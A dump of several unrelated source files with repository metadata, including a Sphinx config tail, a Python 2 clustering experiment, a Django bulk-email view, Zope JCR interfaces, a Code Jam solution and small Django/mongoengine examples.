(master_doc, 'pysparkling.tex', u'pysparkling Documentation',
u'Sven Kreiss', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pysparkling', u'pysparkling Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'pysparkling', u'pysparkling Documentation',
author, 'pysparkling', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| [
"[email protected]"
]
| |
df2ff3db7a4108d0c2ebdb1e4027c6e6897ddf3f | 4ddedf2a3829d7cead057da3ed2ffcffc153786e | /6_google_trace/SONIA/testing/feature_encoder/BPNN/cluster/ann/cluster_4.py | f832fe7fc0ffacb1d946f6351bc72a3b4f6f55c4 | [
"MIT"
]
| permissive | thieu1995/machine_learning | b7a854ea03f5559a57cb93bce7bb41178596033d | 40595a003815445a7a9fef7e8925f71d19f8fa30 | refs/heads/master | 2023-03-03T10:54:37.020952 | 2019-09-08T11:42:46 | 2019-09-08T11:42:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,838 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 13 15:49:27 2018
@author: thieunv
Cluster --> Update 10% matrix weight dua tren c_tung_hidden va dist_tung_hidden
Ket qua toi` hon cluster 3 (Toi nhat)
"""
import tensorflow as tf
import numpy as np
from scipy.spatial import distance
from math import exp, sqrt
import copy
from random import randint
from operator import itemgetter
#import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
from pandas import read_csv
from sklearn.metrics import mean_squared_error, mean_absolute_error
from sklearn import preprocessing
class Model(object):
def __init__(self, dataset_original, list_idx, epoch, batch_size, sliding, learning_rate, positive_number, stimulation_level):
self.dataset_original = dataset_original
self.train_idx = list_idx[0]
self.test_idx = list_idx[1]
self.epoch = epoch
self.batch_size = batch_size
self.sliding = sliding
self.learning_rate = learning_rate
self.positive_number = positive_number
self.stimulation_level = stimulation_level
self.min_max_scaler = preprocessing.MinMaxScaler()
self.standard_scaler = preprocessing.StandardScaler()
def preprocessing_data(self):
train_idx, test_idx, dataset_original, sliding = copy.deepcopy(self.train_idx), copy.deepcopy(self.test_idx), copy.deepcopy(self.dataset_original), copy.deepcopy(self.sliding)
## Get original dataset
dataset_split = dataset_original[:test_idx + sliding]
training_set = dataset_original[0:train_idx+sliding]
testing_set = dataset_original[train_idx+sliding:test_idx+sliding]
training_set_transform = self.min_max_scaler.fit_transform(training_set)
testing_set_transform = self.min_max_scaler.transform(testing_set)
dataset_transform = np.concatenate( (training_set_transform, testing_set_transform), axis=0 )
self.dataset_scale = copy.deepcopy(dataset_transform)
## Handle data with sliding
dataset_sliding = dataset_transform[:len(dataset_transform)-sliding]
for i in range(sliding-1):
dddd = np.array(dataset_transform[i+1: len(dataset_transform)-sliding+i+1])
dataset_sliding = np.concatenate((dataset_sliding, dddd), axis=1)
## Split data to set train and set test
self.X_train, self.y_train = dataset_sliding[0:train_idx], dataset_sliding[sliding:train_idx+sliding, 0:1]
self.X_test = dataset_sliding[train_idx:test_idx-sliding]
self.y_test = dataset_split[train_idx+sliding:test_idx]
print("Processing data done!!!")
def preprocessing_data_2(self):
train_idx, test_idx, dataset_original, sliding = copy.deepcopy(self.train_idx), copy.deepcopy(self.test_idx), copy.deepcopy(self.dataset_original), copy.deepcopy(self.sliding)
## Transform all dataset
dataset_split = dataset_original[:test_idx + sliding]
dataset_transform = self.min_max_scaler.fit_transform(dataset_split)
self.dataset_scale_2 = copy.deepcopy(dataset_transform)
## Handle data with sliding
dataset_sliding = dataset_transform[:len(dataset_transform)-sliding]
for i in range(sliding-1):
dddd = np.array(dataset_transform[i+1: len(dataset_transform)-sliding+i+1])
dataset_sliding = np.concatenate((dataset_sliding, dddd), axis=1)
## Split data to set train and set test
self.X_train_2, self.y_train_2 = dataset_sliding[0:train_idx], dataset_sliding[sliding:train_idx+sliding, 0:1]
self.X_test_2 = dataset_sliding[train_idx:test_idx-sliding]
self.y_test_2 = dataset_split[train_idx+sliding:test_idx]
print("Processing data done!!!")
def encoder_features(self):
train_X = copy.deepcopy(self.X_train)
stimulation_level, positive_number = self.stimulation_level, self.positive_number
### Qua trinh train va dong thoi tao cac hidden unit (Pha 1 - cluster data)
# 2. Khoi tao hidden thu 1
hu1 = [0, Model.get_random_input_vector(train_X)] # hidden unit 1 (t1, wH)
list_hu = [copy.deepcopy(hu1)] # list hidden units
matrix_Wih = copy.deepcopy(hu1[1]).reshape(1, hu1[1].shape[0]) # Mang 2 chieu
# training_detail_file_name = full_path + 'SL=' + str(stimulation_level) + '_Slid=' + str(sliding) + '_Epoch=' + str(epoch) + '_BS=' + str(batch_size) + '_LR=' + str(learning_rate) + '_PN=' + str(positive_number) + '_CreateHU.txt'
m = 0
while m < len(train_X):
list_dist_mj = [] # Danh sach cac dist(mj)
# number of hidden units
for j in range(0, len(list_hu)): # j: la chi so cua hidden thu j
dist_sum = 0.0
for i in range(0, len(train_X[0])): # i: la chi so cua input unit thu i
dist_sum += pow(train_X[m][i] - matrix_Wih[j][i], 2.0)
list_dist_mj.append([j, sqrt(dist_sum)])
list_dist_mj_sorted = sorted(list_dist_mj, key=itemgetter(1)) # Sap xep tu be den lon
c = list_dist_mj_sorted[0][0] # c: Chi so (index) cua hidden unit thu c ma dat khoang cach min
distmc = list_dist_mj_sorted[0][1] # distmc: Gia tri khoang cach nho nhat
if distmc < stimulation_level:
list_hu[c][0] += 1 # update hidden unit cth
neighbourhood_node = 1 + int( 0.9 * len(list_hu) )
for i in range(0, neighbourhood_node ):
c_temp = list_dist_mj_sorted[i][0]
dist_temp = list_dist_mj_sorted[i][1]
hic = exp(- (dist_temp * dist_temp) )
delta = (positive_number * hic) * (train_X[m] - list_hu[c_temp][1])
list_hu[c_temp][1] += delta
matrix_Wih[c_temp] += delta
# Tiep tuc vs cac example khac
m += 1
if m % 100 == 0:
print "distmc = {0}".format(distmc)
print "m = {0}".format(m)
else:
print "Failed !!!. distmc = {0}".format(distmc)
list_hu.append([0, copy.deepcopy(train_X[m]) ])
print "Hidden unit thu: {0} duoc tao ra.".format(len(list_hu))
matrix_Wih = np.append(matrix_Wih, [copy.deepcopy(train_X[m])], axis = 0)
for hu in list_hu:
hu[0] = 0
# then go to step 1
m = 0
### +++
### +++ Get the last matrix weight
self.matrix_Wih = copy.deepcopy(matrix_Wih)
self.list_hu_1 = copy.deepcopy(list_hu)
print("Encoder features done!!!")
def transform_features(self):
temp1 = []
for i in range(0, len(self.X_train)):
Sih = []
for j in range(0, len(self.matrix_Wih)): # (w11, w21) (w12, w22), (w13, w23)
Sih.append(np.tanh( Model.distance_func(self.matrix_Wih[j], self.X_train[i])))
temp1.append(np.array(Sih))
temp2 = []
for i in range(0, len(self.X_test)):
Sih = []
for j in range(0, len(self.matrix_Wih)): # (w11, w21) (w12, w22), (w13, w23)
Sih.append(np.tanh( Model.distance_func(self.matrix_Wih[j], self.X_test[i])))
temp2.append(np.array(Sih))
self.S_train = np.array(temp1)
self.S_test = np.array(temp2)
print("Transform features done!!!")
def draw_loss(self):
plt.figure(1)
plt.plot(range(self.epoch), self.loss_train, label="Loss on training per epoch")
plt.xlabel('Iteration', fontsize=12)
plt.ylabel('Loss', fontsize=12)
def draw_predict(self):
plt.figure(2)
plt.plot(self.y_test_inverse)
plt.plot(self.y_pred_inverse)
plt.title('Model predict')
plt.ylabel('Real value')
plt.xlabel('Point')
plt.legend(['realY... Test Score RMSE= ' + str(self.score_test_RMSE) , 'predictY... Test Score MAE= '+ str(self.score_test_MAE)], loc='upper right')
def draw_data_train(self):
plt.figure(3)
plt.plot(self.X_train[:, 0], self.X_train[:, 1], 'ro')
plt.title('Train Dataset')
plt.ylabel('Real value')
plt.xlabel('Real value')
def draw_data_test(self):
plt.figure(4)
plt.plot(self.X_test[:, 0], self.X_test[:, 1], 'ro')
plt.title('Test Dataset')
plt.ylabel('Real value')
plt.xlabel('Real value')
def draw_center(self):
plt.figure(5)
plt.plot(self.matrix_Wih[:, 0], self.matrix_Wih[:, 1], 'ro')
plt.title('Centers Cluter KMEANS')
plt.ylabel('Real value')
plt.xlabel('Real value')
def draw_dataset(self):
plt.figure(6)
plt.plot(dataset_original, 'ro')
plt.title('Original dataset')
plt.ylabel('Real value')
plt.xlabel('Real value')
def draw_scale_dataset(self):
plt.figure(7)
plt.plot(self.dataset_scale, 'ro')
plt.title('Scale dataset')
plt.ylabel('Real value')
plt.xlabel('Real value')
def draw_scale_dataset_2(self):
plt.figure(8)
plt.plot(self.dataset_scale_2, 'ro')
plt.title('Scale dataset _ 2')
plt.ylabel('Real value')
plt.xlabel('Real value')
def fit(self):
self.preprocessing_data()
self.preprocessing_data_2()
self.encoder_features()
self.transform_features()
self.draw_data_train()
self.draw_data_test()
self.draw_center()
self.draw_dataset()
self.draw_scale_dataset()
self.draw_scale_dataset_2()
@staticmethod
def distance_func(a, b):
return distance.euclidean(a, b)
@staticmethod
def sigmoid_activation(x):
return 1.0 / (1.0 + exp(-x))
@staticmethod
def get_random_input_vector(train_X):
return copy.deepcopy(train_X[randint(0, len(train_X)-1)])
@staticmethod
def get_batch_data_next(trainX, trainY, index, batch_size):
real_index = index*batch_size
if (len(trainX) % batch_size != 0 and index == (len(trainX)/batch_size +1) ):
return (trainX[real_index:], trainY[real_index:])
elif (real_index == len(trainX)):
return ([], [])
else:
return (trainX[real_index: (real_index+batch_size)], trainY[real_index: (real_index+batch_size)])
## Load data frame
#full_path_name="/mnt/volume/ggcluster/spark-2.1.1-bin-hadoop2.7/thieunv/machine_learning/6_google_trace/data/"
#full_path= "/mnt/volume/ggcluster/spark-2.1.1-bin-hadoop2.7/thieunv/machine_learning/6_google_trace/FLNN/results/notDecompose/data10minutes/univariate/cpu/"
file_name = "Fuzzy_data_sampling_617685_metric_10min_datetime_origin.csv"
full_path_name = "/home/thieunv/university/LabThayMinh/code/6_google_trace/data/"
full_path = "/home/thieunv/university/LabThayMinh/code/6_google_trace/tensorflow/testing/"
df = read_csv(full_path_name+ file_name, header=None, index_col=False, usecols=[0], engine='python')
dataset_original = df.values
stimulation_level = [0.25] #[0.10, 0.2, 0.25, 0.50, 1.0, 1.5, 2.0] # [0.20]
positive_numbers = [0.01] #[0.005, 0.01, 0.025, 0.05, 0.1, 0.15, 0.20] # [0.1]
learning_rates = [0.25] #[0.005, 0.01, 0.025, 0.05, 0.10, 0.12, 0.15] # [0.2]
sliding_windows = [2] #[ 2, 3, 5] # [3]
epochs = [2800] #[100, 250, 500, 1000, 1500, 2000] # [500]
batch_sizes = [32] #[8, 16, 32, 64, 128] # [16]
list_num = [(2800, 4170)]
pl1 = 1 # Use to draw figure
#pl2 = 1000
so_vong_lap = 0
for list_idx in list_num:
for sliding in sliding_windows:
for sti_level in stimulation_level:
for epoch in epochs:
for batch_size in batch_sizes:
for learning_rate in learning_rates:
for positive_number in positive_numbers:
febpnn = Model(dataset_original, list_idx, epoch, batch_size, sliding, learning_rate, positive_number, sti_level)
febpnn.fit()
so_vong_lap += 1
if so_vong_lap % 5000 == 0:
print "Vong lap thu : {0}".format(so_vong_lap)
print "Processing DONE !!!"
| [
"[email protected]"
]
| |
c3ab52e0c857c71ffaabff7df542b4872c48dbcf | 87f574548a321a668f325bc3d120a45366b0b76b | /studioadmin/views/email_users.py | 7f409efcb24684c5ca97d5f8c036492e52fb13ac | []
| no_license | judy2k/pipsevents | 1d19fb4c07e4a94d285e6b633e6ae013da0d1efd | 88b6ca7bb64b0bbbbc66d85d2fa9e975b1bd3081 | refs/heads/master | 2021-01-14T11:11:26.616532 | 2016-10-07T20:47:39 | 2016-10-07T20:55:13 | 36,600,721 | 0 | 0 | null | 2015-05-31T11:51:14 | 2015-05-31T11:51:14 | null | UTF-8 | Python | false | false | 11,607 | py | import ast
import logging
from math import ceil
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import Group, User
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.template.loader import get_template
from django.template.response import TemplateResponse
from django.shortcuts import HttpResponseRedirect, render
from django.utils.safestring import mark_safe
from django.core.mail.message import EmailMultiAlternatives
from booking.models import Event, Booking
from booking.email_helpers import send_support_email
from studioadmin.forms import EmailUsersForm, ChooseUsersFormSet, \
UserFilterForm
from studioadmin.views.helpers import staff_required, url_with_querystring
from activitylog.models import ActivityLog
logger = logging.getLogger(__name__)
@login_required
@staff_required
def choose_users_to_email(request,
template_name='studioadmin/choose_users_form.html'):
userfilterform = UserFilterForm(prefix='filter')
if 'filter' in request.POST:
event_ids = request.POST.getlist('filter-events')
lesson_ids = request.POST.getlist('filter-lessons')
if event_ids == ['']:
if request.session.get('events'):
del request.session['events']
event_ids = []
elif '' in event_ids:
event_ids.remove('')
else:
request.session['events'] = event_ids
if lesson_ids == ['']:
if request.session.get('lessons'):
del request.session['lessons']
lesson_ids = []
elif '' in lesson_ids:
lesson_ids.remove('')
else:
request.session['lessons'] = lesson_ids
if not event_ids and not lesson_ids:
usersformset = ChooseUsersFormSet(
queryset=User.objects.all().order_by('first_name', 'last_name')
)
else:
event_and_lesson_ids = event_ids + lesson_ids
bookings = Booking.objects.filter(event__id__in=event_and_lesson_ids)
user_ids = set([booking.user.id for booking in bookings
if booking.status == 'OPEN'])
usersformset = ChooseUsersFormSet(
queryset=User.objects.filter(id__in=user_ids)
.order_by('first_name', 'last_name')
)
userfilterform = UserFilterForm(
prefix='filter',
initial={'events': event_ids, 'lessons': lesson_ids}
)
elif request.method == 'POST':
userfilterform = UserFilterForm(prefix='filter', data=request.POST)
usersformset = ChooseUsersFormSet(request.POST)
if usersformset.is_valid():
event_ids = request.session.get('events', [])
lesson_ids = request.session.get('lessons', [])
users_to_email = []
for form in usersformset:
# check checkbox value to determine if that user is to be
# emailed; add user_id to list
if form.is_valid():
if form.cleaned_data.get('email_user'):
users_to_email.append(form.instance.id)
request.session['users_to_email'] = users_to_email
return HttpResponseRedirect(url_with_querystring(
reverse('studioadmin:email_users_view'), events=event_ids, lessons=lesson_ids)
)
else:
# for a new GET, remove any event/lesson session data
if request.session.get('events'):
del request.session['events']
if request.session.get('lessons'):
del request.session['lessons']
usersformset = ChooseUsersFormSet(
queryset=User.objects.all().order_by('first_name', 'last_name'),
)
return TemplateResponse(
request, template_name, {
'usersformset': usersformset,
'userfilterform': userfilterform,
'sidenav_selection': 'email_users',
}
)
@login_required
@staff_required
def email_users_view(request, mailing_list=False,
template_name='studioadmin/email_users_form.html'):
if mailing_list:
subscribed, _ = Group.objects.get_or_create(name='subscribed')
users_to_email = subscribed.user_set.all()
else:
users_to_email = User.objects.filter(
id__in=request.session['users_to_email']
)
if request.method == 'POST':
form = EmailUsersForm(request.POST)
test_email = request.POST.get('send_test', False)
if form.is_valid():
subject = '{}{}'.format(
form.cleaned_data['subject'],
' [TEST EMAIL]' if test_email else ''
)
from_address = form.cleaned_data['from_address']
message = form.cleaned_data['message']
cc = form.cleaned_data['cc']
# bcc recipients
email_addresses = [user.email for user in users_to_email]
email_count = len(email_addresses)
number_of_emails = ceil(email_count / 99)
if test_email:
email_lists = [[from_address]]
else:
email_lists = [email_addresses] # will be a list of lists
# split into multiple emails of 99 bcc plus 1 cc
if email_count > 99:
email_lists = [
email_addresses[i : i + 99]
for i in range(0, email_count, 99)
]
host = 'http://{}'.format(request.META.get('HTTP_HOST'))
try:
for i, email_list in enumerate(email_lists):
ctx = {
'subject': subject,
'message': message,
'number_of_emails': number_of_emails,
'email_count': email_count,
'is_test': test_email,
'mailing_list': mailing_list,
'host': host,
}
msg = EmailMultiAlternatives(
subject,
get_template(
'studioadmin/email/email_users.txt').render(
ctx
),
bcc=email_list,
cc=[from_address]
if (i == 0 and cc and not test_email) else [],
reply_to=[from_address]
)
msg.attach_alternative(
get_template(
'studioadmin/email/email_users.html').render(
ctx
),
"text/html"
)
msg.send(fail_silently=False)
if not test_email:
ActivityLog.objects.create(
log='{} email with subject "{}" sent to users {} by'
' admin user {}'.format(
'Mailing list' if mailing_list else 'Bulk',
subject, ', '.join(email_list),
request.user.username
)
)
except Exception as e:
# send mail to tech support with Exception
send_support_email(
e, __name__, "Bulk Email to students"
)
ActivityLog.objects.create(
log="Possible error with sending {} email; "
"notification sent to tech support".format(
'mailing list' if mailing_list else 'bulk'
)
)
if not test_email:
ActivityLog.objects.create(
log='{} email error '
'(email subject "{}"), sent by '
'by admin user {}'.format(
'Mailing list' if mailing_list else 'Bulk',
subject, request.user.username
)
)
if not test_email:
messages.success(
request,
'{} email with subject "{}" has been sent to '
'users'.format(
'Mailing list' if mailing_list else 'Bulk',
subject
)
)
return HttpResponseRedirect(reverse('studioadmin:users'))
else:
messages.success(
request, 'Test email has been sent to {} only. Click '
'"Send Email" below to send this email to '
'users.'.format(
from_address
)
)
# Do this if form not valid OR sending test email
event_ids = request.session.get('events', [])
lesson_ids = request.session.get('lessons', [])
events = Event.objects.filter(id__in=event_ids)
lessons = Event.objects.filter(id__in=lesson_ids)
if form.errors:
totaleventids = event_ids + lesson_ids
totalevents = Event.objects.filter(id__in=totaleventids)
messages.error(
request,
mark_safe(
"Please correct errors in form: {}".format(form.errors)
)
)
form = EmailUsersForm(
initial={
'subject': "; ".join(
(str(event) for event in totalevents)
)
}
)
if test_email:
form = EmailUsersForm(request.POST)
else:
event_ids = ast.literal_eval(request.GET.get('events', '[]'))
events = Event.objects.filter(id__in=event_ids)
lesson_ids = ast.literal_eval(request.GET.get('lessons', '[]'))
lessons = Event.objects.filter(id__in=lesson_ids)
totaleventids = event_ids + lesson_ids
totalevents = Event.objects.filter(id__in=totaleventids)
form = EmailUsersForm(
initial={
'subject': "; ".join((str(event) for event in totalevents))
}
)
return TemplateResponse(
request, template_name, {
'form': form,
'users_to_email': users_to_email,
'sidenav_selection': 'mailing_list'
if mailing_list else 'email_users',
'events': events,
'lessons': lessons,
'mailing_list': mailing_list
}
)
| [
"[email protected]"
]
| |
33516c24ec951e32d2454058cccb932ff632af1d | 9855a6472fa9cd0a0ed75d5d1110eb5450e38c35 | /django_mailbox/runtests.py | f5b0ff3b0c41ddd22e10232d108f622b41e04984 | []
| no_license | JessAtBlocBoxCo/blocbox | efef025333b689e4c9e0fb6a7bfb2237fcdc72a0 | 0966fd0ba096b2107bd6bd05e08c43b4902e6ff2 | refs/heads/master | 2020-04-11T04:30:25.792700 | 2015-09-22T04:41:34 | 2015-09-22T04:41:34 | 23,008,502 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,117 | py | #!/usr/bin/env python
import sys
from os.path import dirname, abspath
try:
from django import setup
except ImportError:
pass
from django.conf import settings
if not settings.configured:
settings.configure(
DATABASES={
'default': {
'ENGINE': 'django.db.backends.sqlite3',
},
},
INSTALLED_APPS=[
'django.contrib.auth',
'django.contrib.contenttypes',
'django_mailbox',
]
)
from django.test.simple import DjangoTestSuiteRunner
def runtests(*test_args):
if not test_args:
test_args = ['django_mailbox']
parent = dirname(abspath(__file__))
sys.path.insert(0, parent)
try:
# ensure that AppRegistry has loaded
setup()
except NameError:
# This version of Django is too old for an app registry.
pass
runner = DjangoTestSuiteRunner(
verbosity=1,
interactive=False,
failfast=False
)
failures = runner.run_tests(test_args)
sys.exit(failures)
if __name__ == '__main__':
runtests(*sys.argv[1:])
| [
"[email protected]"
]
| |
15a59428a27529aafc46c577811104b43b63a731 | 460027c62df6a6939c342d2d2f49a727c8fc955c | /src/nuxeo/jcr/interfaces.py | 0cd0ba5c447f9981fb9a2c9e36f5c777740674bf | []
| no_license | nuxeo-cps/zope3--nuxeo.jcr | ef6d52272835fa14375308bf5a51dbee68b2252a | 88e83d30232226ad71b6f24a2c00e5ad9ba5e603 | refs/heads/main | 2023-01-23T19:56:27.515465 | 2006-10-20T16:54:01 | 2006-10-20T16:54:01 | 317,994,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,597 | py | ##############################################################################
#
# Copyright (c) 2006 Nuxeo and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
# Author: Florent Guillaume <[email protected]>
# $Id$
"""Capsule JCR interfaces.
"""
from zope.interface import Interface
from ZODB.POSException import ConflictError # for reimport
class ProtocolError(ValueError):
pass
class IJCRController(Interface):
"""Commands between Zope and the JCR bridge.
All commands are synchronous.
The commands may also return JCR events, if some have been sent.
They are accumulated and can be read by ``getPendingEvents()``.
"""
def connect():
"""Connect the controller to the server.
"""
def login(workspaceName):
"""Login to a given workspace.
This is the first command sent. It creates a session on the
JCR side and puts it into a transaction.
Returns the root node UUID.
"""
def prepare():
"""Prepare the current transaction for commit.
May raise a ConflictError.
"""
def commit():
"""Commit the prepared transaction, start a new one.
"""
def abort():
"""Abort the current transaction, start a new one.
"""
def checkpoint(uuid):
"""Checkpoint: checkin and checkout
"""
def restore(uuid, versionName=''):
"""Restore a node.
Return list of uuids to deactivate.
"""
def getNodeTypeDefs():
"""Get the schemas of the node type definitions.
Returns a string containing a set of CND declarations.
System types may be omitted.
"""
def getNodeType(uuid):
"""Get the type of a node.
"""
def getNodeStates(uuids):
"""Get the state of several nodes.
Additional node states may be returned, to improve network
transfers.
Returns a mapping of UUID to a tuple (`name`, `parent_uuid`,
`children`, `properties`, `deferred`).
- `name` is the name of the node,
- `parent_uuid` is the UUID of the node's parent, or None if
it's the root,
- `children` is a sequence of tuples representing children
nodes, usually (`name`, `uuid`, `type`), but for a child with
same-name siblings, (`name`, [`uuid`s], `type`),
- `properties` is a sequence of (`name`, `value`),
- `deferred` is a sequence of `name` of the remaining deferred
properties.
An error is returned if there's no such UUID.
"""
def getNodeProperties(uuid, names):
"""Get the value of selected properties.
Returns a mapping of property name to value.
An error is returned if the UUID doesn't exist or if one of the
names doesn't exist as a property.
"""
def sendCommands(commands):
"""Send a sequence of modification commands to the JCR.
`commands` is an iterable returning tuples of the form:
- 'add', parent_uuid, name, node_type, props_mapping, token
- 'modify', uuid, props_mapping
- 'remove', uuid
- 'order' XXX
A JCR save() is done after the commands have been sent.
Returns a mapping of token -> uuid, which gives the new UUIDs
for created nodes.
"""
def getPendingEvents():
"""Get pending events.
The pending events are sent asynchronously by the server and
accumulated until read by this method.
"""
def getPath(uuid):
"""Get the path of a given UUID.
Returns the path or None.
The path is relative to the JCR workspace root.
"""
def searchProperty(prop_name, value):
"""Search the JCR for nodes where prop_name = 'value'.
Returns a sequence of (uuid, path).
The paths are relative to the JCR workspace root.
"""
def move(uuid, dest_uuid, name):
"""Move the document to another container.
"""
def copy(uuid, dest_uuid, name):
"""Copy the document to another container.
"""
| [
"devnull@localhost"
]
| devnull@localhost |
3aaf3331c8160b13805128f0a48758614d163f12 | e5f7d7706062b7807daafaf5b670d9f273440286 | /stocks/admin.py | 3da94a24279993788e7694d3af8b4fe75814404d | []
| no_license | fchampalimaud/flydb | bd01839c163aa34277091f454f8ad38e3fd45dc4 | 2d3ad9ff5903a26070258f707228334cd765a647 | refs/heads/master | 2021-06-17T15:38:25.517946 | 2018-01-17T16:16:00 | 2018-01-17T16:16:00 | 185,334,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 206 | py | from pathlib import Path
from django.contrib import admin
from django.apps import apps
app = apps.get_app_config(Path(__file__).parent.name)
for model in app.get_models():
admin.site.register(model)
| [
"[email protected]"
]
| |
74f037f36854ed429ba78246687bfa075c1ec9b2 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_206/689.py | ade9216b11543d12d4e0795d77c30c952d9e8947 | []
| no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,062 | py | from itertools import \
product, \
permutations, \
combinations, \
combinations_with_replacement
from functools import reduce, lru_cache
from math import floor,ceil,inf,sqrt
def intercept_time(i,j):
if i[1] == j[1]:
return inf
else:
return (j[0]-i[0])/(i[1]-j[1])
def intercept_distance(i,j):
if intercept_time(i,j) < 0:
return inf
else:
return intercept_time(i,j)*i[1] + i[0]
def solve(D, horses):
horses.sort()
while len(horses) > 1:
if intercept_distance(horses[-2], horses[-1]) < D:
del horses[-2]
else:
del horses[-1]
return D / intercept_time(horses[0], (D,0))
if __name__ == '__main__':
import sys,re
data = iter(sys.stdin.read().splitlines())
T = int(next(data))
for (case_num, case) in enumerate(data):
D,N = map(int, case.split())
horses = []
for _ in range(N):
horses.append(tuple(map(int, next(data).split())))
print('Case #{}: {}'.format(case_num+1, solve(D, horses)))
| [
"[email protected]"
]
| |
d6886e124c6a5e23cfe5c3167ad569f20e55a369 | 3cedb583e9f3dfcdf16aeba56a0b3ff7c6213e99 | /python-codes/m2_curso_em_video_estruturas_de_controle/ex048.0.py | 7c2fd6a5930cb1648fc94bfe1920cee6b20f008b | [
"MIT"
]
| permissive | lucasportella/learning-python | 0f39ae2389db6d07b5b8c14ebe0c24f1e93c77c5 | a9449dffd489e7e1f1619e3acef86bc2c64f0f14 | refs/heads/master | 2022-12-26T15:04:12.806300 | 2020-10-14T23:17:47 | 2020-10-14T23:17:47 | 260,685,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | soma = 0
somaPA = 0
print('Todos os números ímpares múltiplos de 3 até 500:')
for cont in range(1,501,2):
if cont % 3 == 0:
soma += 1
somaPA += cont
print(cont,end=' ')
print('\n Número de repetições:', soma)
print('Soma da PA:', somaPA)
| [
"[email protected]"
]
| |
e45a1fac5b581c35a286bd8251ccc0e3f6475205 | ee4a0698f75aa2500bf2ce1b5e5331bc8b57157a | /myproject/course/models.py | 738e4fda86e0a0457361f274b8a857115dd7a817 | []
| no_license | coderrohanpahwa/one_to_one_model | 5398732410027bfad91c5d5db01e528397c87703 | df4fd8ce89d74d41d49671ba8dd5759b80af3d43 | refs/heads/main | 2022-12-25T14:12:31.253350 | 2020-10-06T08:58:38 | 2020-10-06T08:58:38 | 301,669,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | py | from django.db import models
from django.contrib.auth.models import User
from .views import k
# Create your models here.
class Answer(models.Model):
user=models.OneToMany(User,models.CASCADE)
answer=models.CharField(max_length=100) | [
"[email protected]"
]
| |
e123eb5ce78814907f4c0576ae6dc701c3f31bc2 | c105570f12f1d56087ffb831f5d34cd763d6c90b | /top/api/rest/WlbWaybillIQuerydetailRequest.py | e31f3da969397463b9eaf5940b3a4f8b3c5c3026 | []
| no_license | wjianwei126/Alinone | 01607423833d7736b2fd3c77e9e21f63c69b4e4c | 80144d4657cb049d651c09647eb245405240f12f | refs/heads/master | 2020-12-07T05:14:58.746777 | 2015-05-06T12:48:33 | 2015-05-06T12:48:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | '''
Created by auto_sdk on 2014-11-09 14:51:18
'''
from top.api.base import RestApi
class WlbWaybillIQuerydetailRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.waybill_detail_query_request = None
def getapiname(self):
return 'taobao.wlb.waybill.i.querydetail'
| [
"[email protected]"
]
| |
d0f1683880dd97dbf57a8ff8ca500f4470b5aa9f | a42ed872908291bbfc5ae2f68968edc4c47edfcf | /lesson_16/choices_test.py | 8c1ac0adaa1e1dc47e02cf3b312e2d5874927c43 | []
| no_license | antonplkv/itea_advanced_august | b87f48cc48134ce1a73e167a5c834322792d0167 | 265c124e79747df75b58a1fd8c5d13605c1041b2 | refs/heads/master | 2023-01-02T23:31:39.050216 | 2020-10-28T19:15:01 | 2020-10-28T19:15:01 | 291,792,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | import mongoengine as me
me.connect('testtetsttetst')
class Task(me.Document):
LOW_PRIORITY = 1
MEDIUM_PRIORITY = 2
HIGH_PRIORITY = 3
PRIORITIES = (
(LOW_PRIORITY, 'Низкий приоритет'),
(MEDIUM_PRIORITY, 'Средний приоритет'),
(HIGH_PRIORITY, 'Высокий приоритет')
)
INSIDE_CATEGORY = 1
OUTSIDE_CATEGORY = 2
CATEGORIES = (
(INSIDE_CATEGORY, 'Проблема в магазине'),
(OUTSIDE_CATEGORY, 'Проблема на складе'),
)
priority = me.IntField(choices=PRIORITIES)
